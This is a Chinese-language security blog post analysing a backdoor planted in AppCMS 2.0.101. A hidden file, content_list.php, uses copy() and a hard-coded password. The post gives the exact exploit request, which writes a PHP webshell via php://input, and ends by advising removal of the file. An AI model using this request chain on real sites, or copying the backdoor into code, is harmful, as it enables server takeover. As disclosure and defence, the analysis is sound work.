AppCMS 2.0.101 后门分析
源码
官方的更新时间是 2015-8-1
分析
用beyond compare比较与前一个版本的区别
可以发现,在 templates/m/ 文件夹下出现了一个 content_list.php 文件,修改时间为 2017年5月25日。
经过解密,9c224bc6b59179729b15e1dddcbb5c82
为字符串kejishidai
的md5值。
由代码知,这里存在一个copy函数构成的后门。
在第12行,实际执行的即为:
copy(trim($_GET[url]),$_GET[cms]);
将参数url设置为php://input
,参数cms设置为shell的文件名,然后POST传入webshell。如下:
http://127.0.0.1:2500/appcms/appcms_2.0.101/templates/m/content_list.php?session=kejishidai&url=php://input&cms=temp.php
POST:
<?php phpinfo();?>
接着访问:
http://127.0.0.1:2500/appcms/appcms_2.0.101/templates/m/temp.php
getshell。
建议
删除 templates/m/ 文件夹下的content_list.php。
本文作者: iceH
本文链接: http://www.secice.cn/p/4a62cc6c
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!